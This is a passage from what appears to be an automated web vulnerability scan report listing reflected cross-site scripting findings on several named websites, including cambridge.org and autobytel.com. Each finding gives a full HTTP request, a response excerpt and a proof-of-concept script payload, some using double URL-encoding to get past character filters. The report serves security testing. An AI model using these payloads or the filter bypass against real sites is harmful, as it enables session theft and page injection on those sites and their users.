<strong> http://www.androidtapp.com/wp-includes/js/jqueryd4bf8<script>alert(1)</script>90010bbd65f/jquery.js?ver=1.4.2 </strong>
...[SNIP]...

2.77. http://www.androidtapp.com/wp-includes/js/jquery/jquery.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.androidtapp.com
Path:	/wp-includes/js/jquery/jquery.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5873b<script>alert(1)</script>f3b26b81f90 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jquery/jquery.js5873b<script>alert(1)</script>f3b26b81f90?ver=1.4.2 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(%22DORK%22)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cfd4e1e2237de0ee4f251e86b94bbc2a

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:16:36 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:16:32 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Vary: User-Agent
Content-Length: 55434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"><head
profile
...[SNIP]...
<strong> http://www.androidtapp.com/wp-includes/js/jquery/jquery.js5873b<script>alert(1)</script>f3b26b81f90?ver=1.4.2 </strong>
...[SNIP]...

2.78. http://www.androidtapp.com/wp-login.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.androidtapp.com
Path:	/wp-login.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9b764<script>alert(1)</script>923e80a7fe9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-login.php9b764<script>alert(1)</script>923e80a7fe9 HTTP/1.1
Host: www.androidtapp.com
Proxy-Connection: keep-alive
Referer: http://www.androidtapp.com/favicon.icoef3b2%3Cscript%3Ealert(1)%3C/script%3Ed2de5acaa49
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=b4b02331d89ff875:T=1301681709:S=ALNI_MYpSTRZveHosSTXFDXa1dTNOqCBCQ; PHPSESSID=bd8c5d93b8229accde529b3c0d1c1feb; GDgkjFlavnmGhFmj=kvGgzkvGumABBBxy; SJECT=CKON

Response

HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Fri, 01 Apr 2011 18:16:32 GMT
Server: LiteSpeed
Connection: close
X-Pingback: http://www.androidtapp.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
X-Powered-By: W3 Total Cache/0.9.1.1
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Fri, 01 Apr 2011 18:16:30 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: User-Agent
Content-Length: 59859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<strong> http://www.androidtapp.com/wp-login.php9b764<script>alert(1)</script>923e80a7fe9
</strong>
...[SNIP]...

2.79. http://www.autobytel.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3b1c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252214f4c67906f was submitted in the REST URL parameter 1. This input was echoed as a3b1c"style="x:expression(alert(1))"14f4c67906f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /favicon.icoa3b1c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252214f4c67906f HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.autobytel.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response (redirected)

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 21068
Vary: Accept-Encoding
Expires: Fri, 01 Apr 2011 15:44:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 01 Apr 2011 15:44:30 GMT
Connection: close
Set-Cookie: cweb=JONQJVS10.4.128.188CKMMJ; path=/
Set-Cookie: USER_UUID_VCH=B1598B1E%2DB431%2DED31%2DDDF297B3771F1069;expires=Sun, 24-Mar-2041 15:44:30 GMT;path=/
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Sun, 24-Mar-2041 15:44:30 GMT;path=/
Set-Cookie: COUNT=0;path=/
Set-Cookie: TIME=%7Bts%20%272011%2D04%2D01%2008%3A43%3A30%27%7D;path=/
Set-Cookie: COUNT=1;expires=Sun, 24-Mar-2041 15:44:30 GMT;path=/
Set-Cookie: TIME=%7Bts%20%272011%2D04%2D01%2012%3A44%3A30%27%7D;expires=Sun, 24-Mar-2041 15:44:30 GMT;path=/
Set-Cookie: ID=4%3BABTL;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Sun, 24-Mar-2041 15:44:30 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/




  <!--
This file creates a boxerjam cookie that expires
...[SNIP]...
<link rel="canonical" href="http://www.autobytel.com/favicon.icoa3b1c"style="x:expression(alert(1))"14f4c67906f/">
...[SNIP]...

2.80. http://www.beatthetraffic.com/widgets/traveltimes.aspx [partner parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beatthetraffic.com
Path:	/widgets/traveltimes.aspx

Issue detail

The value of the partner request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e8e2"style%3d"x%3aexpression(alert(1))"46455cc9323 was submitted in the partner parameter. This input was echoed as 4e8e2"style="x:expression(alert(1))"46455cc9323 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /widgets/traveltimes.aspx?regionid=15&customerid=6453&partner=TWC_NewYork4e8e2"style%3d"x%3aexpression(alert(1))"46455cc9323&inrix=1&items=3&link=&code=0&ts=4&rc=false HTTP/1.1
Host: www.beatthetraffic.com
Proxy-Connection: keep-alive
Referer: http://www.ny1.com/Content/ServeContent.aspx?iframe=1&id=904
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 9702
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
p3p: CP="CAO CONi ONL OUR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=51oeeyvyrlq5wommjsu3cvem; path=/; HttpOnly
Date: Fri, 01 Apr 2011 18:11:28 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML>
   <HEAD>
       <title>Beat the Traffic - Drive Times</title>
       <LINK
...[SNIP]...
<link href="/css/TWC_NewYork4e8e2"style="x:expression(alert(1))"46455cc9323.css" type="text/css" rel="stylesheet">
...[SNIP]...

2.81. http://www.cambridge.org/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cambridge.org
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 41430%253cscript%253ealert%25281%2529%253c%252fscript%253e96756d9915e was submitted in the REST URL parameter 1. This input was echoed as 41430<script>alert(1)</script>96756d9915e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /favicon.ico41430%253cscript%253ealert%25281%2529%253c%252fscript%253e96756d9915e HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cambridge.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Cache-Control: private
Content-Type: text/html
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:20:01 GMT
Content-Length: 7320
Connection: close
Set-Cookie: ASPSESSIONIDAABDSSSR=JCLAEEPCFAJCKDHADOOAEPAJ; path=/
Set-Cookie: X-Mapping-kcepobcd=C0FA88536D2ACF6BAE87466C1724671A; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<h
...[SNIP]...
<b>favicon.ico41430<script>alert(1)</script>96756d9915e</b>
...[SNIP]...

2.82. http://www.cambridge.org/uk/404_error.asp [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cambridge.org
Path:	/uk/404_error.asp

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7de6f%253cscript%253ealert%25281%2529%253c%252fscript%253ea0646ab12cc was submitted in the REST URL parameter 2. This input was echoed as 7de6f<script>alert(1)</script>a0646ab12cc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /uk/404_error.asp7de6f%253cscript%253ealert%25281%2529%253c%252fscript%253ea0646ab12cc?error=catalogueimagesecomm_logo.gif HTTP/1.1
Host: www.cambridge.org
Proxy-Connection: keep-alive
Referer: http://www.cambridge.org/uk/catalogue/viewBasket.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCABRQQS=ECKFFCADIDOJDOHAENPDKHMK; __utmz=98387725.1301681613.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASPSESSIONIDAABDSSSR=JCLAEEPCFAJCKDHADOOAEPAJ; X-Mapping-kcepobcd=C0FA88536D2ACF6BAE87466C1724671A; ASPSESSIONIDAACDTTTQ=ELNJAEADLFOCGBEJNEMMJJLI; __utma=98387725.1017428542.1301681613.1301681613.1301681613.1; __utmc=98387725; __utmb=98387725.4.10.1301681613

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Vary: Accept-Encoding
Cache-Control: private
Content-Type: text/html
X-Powered-By: ASP.NET
Content-Length: 8439
Date: Fri, 01 Apr 2011 18:16:35 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<h
...[SNIP]...
<b>404_error.asp7de6f<script>alert(1)</script>a0646ab12cc?error=catalogueimagesecomm_logo.gif</b>
...[SNIP]...

2.83. http://www.cambridge.org/uk/404_error.asp [error parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cambridge.org
Path:	/uk/404_error.asp

Issue detail

The value of the error request parameter is copied into the HTML document as plain text between tags. The payload 45ef8<script>alert(1)</script>412bcae565c was submitted in the error parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /uk/404_error.asp?error=catalogueimagesecomm_logo.gif45ef8<script>alert(1)</script>412bcae565c HTTP/1.1
Host: www.cambridge.org
Proxy-Connection: keep-alive
Referer: http://www.cambridge.org/uk/catalogue/viewBasket.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCABRQQS=ECKFFCADIDOJDOHAENPDKHMK; __utmz=98387725.1301681613.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASPSESSIONIDAABDSSSR=JCLAEEPCFAJCKDHADOOAEPAJ; X-Mapping-kcepobcd=C0FA88536D2ACF6BAE87466C1724671A; ASPSESSIONIDAACDTTTQ=ELNJAEADLFOCGBEJNEMMJJLI; __utma=98387725.1017428542.1301681613.1301681613.1301681613.1; __utmc=98387725; __utmb=98387725.4.10.1301681613

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Vary: Accept-Encoding
Cache-Control: private
Content-Type: text/html
X-Powered-By: ASP.NET
Content-Length: 8419
Date: Fri, 01 Apr 2011 18:16:30 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<h
...[SNIP]...
<b>catalogueimagesecomm_logo.gif45ef8<script>alert(1)</script>412bcae565c</b>
...[SNIP]...

2.84. http://www.cambridge.org/uk/catalogue/images/ecomm_logo.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cambridge.org
Path:	/uk/catalogue/images/ecomm_logo.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9e993%253cscript%253ealert%25281%2529%253c%252fscript%253ed0d9917e9d7 was submitted in the REST URL parameter 2. This input was echoed as 9e993<script>alert(1)</script>d0d9917e9d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /uk/catalogue9e993%253cscript%253ealert%25281%2529%253c%252fscript%253ed0d9917e9d7/images/ecomm_logo.gif HTTP/1.1
Host: www.cambridge.org
Proxy-Connection: keep-alive
Referer: http://www.cambridge.org/uk/catalogue/viewBasket.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCABRQQS=ECKFFCADIDOJDOHAENPDKHMK; __utmz=98387725.1301681613.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASPSESSIONIDAABDSSSR=JCLAEEPCFAJCKDHADOOAEPAJ; X-Mapping-kcepobcd=C0FA88536D2ACF6BAE87466C1724671A; ASPSESSIONIDAACDTTTQ=ELNJAEADLFOCGBEJNEMMJJLI; __utma=98387725.1017428542.1301681613.1301681613.1301681613.1; __utmc=98387725; __utmb=98387725.4.10.1301681613

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Vary: Accept-Encoding
Cache-Control: private
Content-Type: text/html
X-Powered-By: ASP.NET
Content-Length: 8419
Date: Fri, 01 Apr 2011 18:16:43 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<h
...[SNIP]...
<b>catalogue9e993<script>alert(1)</script>d0d9917e9d7imagesecomm_logo.gif</b>
...[SNIP]...

2.85. http://www.cambridge.org/uk/catalogue/images/ecomm_logo.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cambridge.org
Path:	/uk/catalogue/images/ecomm_logo.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 907f0%253cscript%253ealert%25281%2529%253c%252fscript%253ed021c5ae35e was submitted in the REST URL parameter 3. This input was echoed as 907f0<script>alert(1)</script>d021c5ae35e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /uk/catalogue/images907f0%253cscript%253ealert%25281%2529%253c%252fscript%253ed021c5ae35e/ecomm_logo.gif HTTP/1.1
Host: www.cambridge.org
Proxy-Connection: keep-alive
Referer: http://www.cambridge.org/uk/catalogue/viewBasket.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCABRQQS=ECKFFCADIDOJDOHAENPDKHMK; __utmz=98387725.1301681613.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASPSESSIONIDAABDSSSR=JCLAEEPCFAJCKDHADOOAEPAJ; X-Mapping-kcepobcd=C0FA88536D2ACF6BAE87466C1724671A; ASPSESSIONIDAACDTTTQ=ELNJAEADLFOCGBEJNEMMJJLI; __utma=98387725.1017428542.1301681613.1301681613.1301681613.1; __utmc=98387725; __utmb=98387725.4.10.1301681613

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Vary: Accept-Encoding
Cache-Control: private
Content-Type: text/html
X-Powered-By: ASP.NET
Content-Length: 8419
Date: Fri, 01 Apr 2011 18:16:44 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<h
...[SNIP]...
<b>catalogueimages907f0<script>alert(1)</script>d021c5ae35eecomm_logo.gif</b>
...[SNIP]...

2.86. http://www.cambridge.org/uk/catalogue/images/ecomm_logo.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cambridge.org
Path:	/uk/catalogue/images/ecomm_logo.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b0a13%253cscript%253ealert%25281%2529%253c%252fscript%253e7325a07c0e1 was submitted in the REST URL parameter 4. This input was echoed as b0a13<script>alert(1)</script>7325a07c0e1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /uk/catalogue/images/ecomm_logo.gifb0a13%253cscript%253ealert%25281%2529%253c%252fscript%253e7325a07c0e1 HTTP/1.1
Host: www.cambridge.org
Proxy-Connection: keep-alive
Referer: http://www.cambridge.org/uk/catalogue/viewBasket.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCABRQQS=ECKFFCADIDOJDOHAENPDKHMK; __utmz=98387725.1301681613.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASPSESSIONIDAABDSSSR=JCLAEEPCFAJCKDHADOOAEPAJ; X-Mapping-kcepobcd=C0FA88536D2ACF6BAE87466C1724671A; ASPSESSIONIDAACDTTTQ=ELNJAEADLFOCGBEJNEMMJJLI; __utma=98387725.1017428542.1301681613.1301681613.1301681613.1; __utmc=98387725; __utmb=98387725.4.10.1301681613

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Vary: Accept-Encoding
Cache-Control: private
Content-Type: text/html
X-Powered-By: ASP.NET
Content-Length: 8419
Date: Fri, 01 Apr 2011 18:16:45 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<h
...[SNIP]...
<b>catalogueimagesecomm_logo.gifb0a13<script>alert(1)</script>7325a07c0e1</b>
...[SNIP]...

2.87. http://www.cambridge.org/uk/catalogue/images/ecomm_logo.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.cambridge.org
Path:	/uk/catalogue/images/ecomm_logo.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8d56d<a>13f04026c27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /uk/catalogue/images/ecomm_logo.gif?8d56d<a>13f04026c27=1 HTTP/1.1
Host: www.cambridge.org
Proxy-Connection: keep-alive
Referer: http://www.cambridge.org/uk/catalogue/viewBasket.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCABRQQS=ECKFFCADIDOJDOHAENPDKHMK; __utmz=98387725.1301681613.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASPSESSIONIDAABDSSSR=JCLAEEPCFAJCKDHADOOAEPAJ; X-Mapping-kcepobcd=C0FA88536D2ACF6BAE87466C1724671A; ASPSESSIONIDAACDTTTQ=ELNJAEADLFOCGBEJNEMMJJLI; __utma=98387725.1017428542.1301681613.1301681613.1301681613.1; __utmc=98387725; __utmb=98387725.4.10.1301681613

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Vary: Accept-Encoding
Cache-Control: private
Content-Type: text/html
X-Powered-By: ASP.NET
Content-Length: 8400
Date: Fri, 01 Apr 2011 18:16:30 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<h
...[SNIP]...
<b>catalogueimagesecomm_logo.gif?8d56d<a>13f04026c27=1</b>
...[SNIP]...

2.88. http://www.cambridge.org/uk/catalogue/viewBasket.asp [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cambridge.org
Path:	/uk/catalogue/viewBasket.asp

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2b0fa%253cscript%253ealert%25281%2529%253c%252fscript%253ee38b28956e7 was submitted in the REST URL parameter 2. This input was echoed as 2b0fa<script>alert(1)</script>e38b28956e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /uk/catalogue2b0fa%253cscript%253ealert%25281%2529%253c%252fscript%253ee38b28956e7/viewBasket.asp HTTP/1.1
Host: www.cambridge.org
Proxy-Connection: keep-alive
Referer: http://www.cambridge.org/favicon.ico41430%253cscript%253ealert%25281%2529%253c%252fscript%253e96756d9915e
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCABRQQS=ECKFFCADIDOJDOHAENPDKHMK; __utmz=98387725.1301681613.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASPSESSIONIDAABDSSSR=JCLAEEPCFAJCKDHADOOAEPAJ; X-Mapping-kcepobcd=C0FA88536D2ACF6BAE87466C1724671A; __utma=98387725.1017428542.1301681613.1301681613.1301681613.1; __utmc=98387725; __utmb=98387725.3.10.1301681613; ASPSESSIONIDAACDTTTQ=ELNJAEADLFOCGBEJNEMMJJLI

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Vary: Accept-Encoding
Cache-Control: private
Content-Type: text/html
X-Powered-By: ASP.NET
Content-Length: 8413
Date: Fri, 01 Apr 2011 18:16:31 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<h
...[SNIP]...
<b>catalogue2b0fa<script>alert(1)</script>e38b28956e7viewbasket.asp</b>
...[SNIP]...

2.89. http://www.cambridge.org/uk/catalogue/viewBasket.asp [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.cambridge.org
Path:	/uk/catalogue/viewBasket.asp

Issue detail

